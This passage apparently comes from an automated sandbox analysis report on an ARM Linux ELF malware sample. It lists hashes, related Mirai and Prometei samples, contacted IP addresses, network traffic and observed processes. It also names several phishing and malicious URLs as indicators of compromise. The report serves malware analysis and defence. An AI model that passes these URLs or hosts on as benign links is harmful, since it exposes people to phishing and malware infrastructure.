                                                                                                            • 109.202.202.202
                                                                                                            SecuriteInfo.com.FileRepMalware.29874.30583.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 109.202.202.202
                                                                                                            SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 109.202.202.202
                                                                                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 109.202.202.202
                                                                                                            AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            220-002-1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.226.94.59
                                                                                                            https://www.transfernow.net/dl/20250326vT4te41FGet hashmaliciousUnknownBrowse
                                                                                                            • 13.216.34.24
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 34.249.145.219
                                                                                                            http://gitmeidlaw.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 13.33.252.122
                                                                                                            https://www.canva.com/design/DAGiRhhTm_M/1Wb1338QF_BEv0zYs4WfZQ/view?utm_content=DAGiRhhTm_M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6159cd66cf&umid=b05be093-6f53-49ec-8a3b-87bea166f93e&auth=5175c0148660b71d9cf40f5d2581457ec88fc189-b6bc2ea861a256fc841ad8d60030f2289750b83Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.35.93.29
                                                                                                            SecuriteInfo.com.Linux.Mirai.4306.30063.19032.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.247.62.1
                                                                                                            https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                            • 3.168.73.27
                                                                                                            SecuriteInfo.com.FileRepMalware.2065.17794.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.171.230.55
                                                                                                            SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 54.171.230.55
                                                                                                            No context
                                                                                                            No context
                                                                                                            No created / dropped files found
                                                                                                            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                                                                                            Entropy (8bit):6.176001000949916
                                                                                                            TrID:
                                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                            File name:bin.sh.elf
                                                                                                            File size:254'180 bytes
                                                                                                            MD5:fe597b006a3b685aa0e6680b2f8193a8
                                                                                                            SHA1:a9b07391bac6600d7cb21f26308039cf5b94fc5f
                                                                                                            SHA256:a9b27492292904b108baf4ae4578b7354d4257094a513e3db48f35b3684cb0eb
                                                                                                            SHA512:28e03d190b3d8f4ed0dfbc9723e5d862d8ed3e34040811d92f3ef6ec813318cea401b42c77f272448127603aa9a6448a55db9241766ff5a55614b399e087c9eb
                                                                                                            SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOh:T2s/bW+UmJqBxAuaPRhVabEDSDP99zB7
                                                                                                            TLSH:AC44398AFD81AF25D5D4227BFE2F428A33131BB8D2EB71129D145F24768A94F0F3A541
                                                                                                            File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                            Download Network PCAP: filteredfull

                                                                                                            • Total Packets: 12
                                                                                                            • 443 (HTTPS)
                                                                                                            • 80 (HTTP)
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Mar 27, 2025 15:38:51.239258051 CET33608443192.168.2.2354.171.230.55
                                                                                                            Mar 27, 2025 15:38:52.263200045 CET43928443192.168.2.2391.189.91.42
                                                                                                            Mar 27, 2025 15:38:57.638365984 CET42836443192.168.2.2391.189.91.43
                                                                                                            Mar 27, 2025 15:38:59.430032969 CET4251680192.168.2.23109.202.202.202
                                                                                                            Mar 27, 2025 15:39:12.484239101 CET43928443192.168.2.2391.189.91.42
                                                                                                            Mar 27, 2025 15:39:19.846681118 CET39242443192.168.2.2334.249.145.219
                                                                                                            Mar 27, 2025 15:39:19.846735001 CET4433924234.249.145.219192.168.2.23
                                                                                                            Mar 27, 2025 15:39:19.846836090 CET39242443192.168.2.2334.249.145.219
                                                                                                            Mar 27, 2025 15:39:19.847193003 CET39242443192.168.2.2334.249.145.219
                                                                                                            Mar 27, 2025 15:39:19.847228050 CET4433924234.249.145.219192.168.2.23
                                                                                                            Mar 27, 2025 15:39:24.770587921 CET42836443192.168.2.2391.189.91.43
                                                                                                            Mar 27, 2025 15:39:28.866112947 CET4251680192.168.2.23109.202.202.202
                                                                                                            Mar 27, 2025 15:39:53.438683033 CET43928443192.168.2.2391.189.91.42
                                                                                                            Mar 27, 2025 15:40:19.839283943 CET39242443192.168.2.2334.249.145.219
                                                                                                            Mar 27, 2025 15:40:19.880281925 CET4433924234.249.145.219192.168.2.23
                                                                                                            Mar 27, 2025 15:40:56.024270058 CET4433924234.249.145.219192.168.2.23

                                                                                                            System Behavior

                                                                                                            Start time (UTC):14:38:52
                                                                                                            Start date (UTC):27/03/2025
                                                                                                            Path:/tmp/bin.sh.elf
                                                                                                            Arguments:/tmp/bin.sh.elf
                                                                                                            File size:4956856 bytes
                                                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                            Start time (UTC):14:40:19
                                                                                                            Start date (UTC):27/03/2025
                                                                                                            Path:/usr/bin/dash
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:40:19
                                                                                                            Start date (UTC):27/03/2025
                                                                                                            Path:/usr/bin/rm
                                                                                                            Arguments:rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
                                                                                                            File size:72056 bytes
                                                                                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                            Start time (UTC):14:40:19
                                                                                                            Start date (UTC):27/03/2025
                                                                                                            Path:/usr/bin/dash
                                                                                                            Arguments:-
                                                                                                            File size:129816 bytes
                                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                            Start time (UTC):14:40:19
                                                                                                            Start date (UTC):27/03/2025
                                                                                                            Path:/usr/bin/rm
                                                                                                            Arguments:rm -f /tmp/tmp.Lzow55mshg /tmp/tmp.eiD2yHyWi8 /tmp/tmp.Fo6CyQGYn7
                                                                                                            File size:72056 bytes
                                                                                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b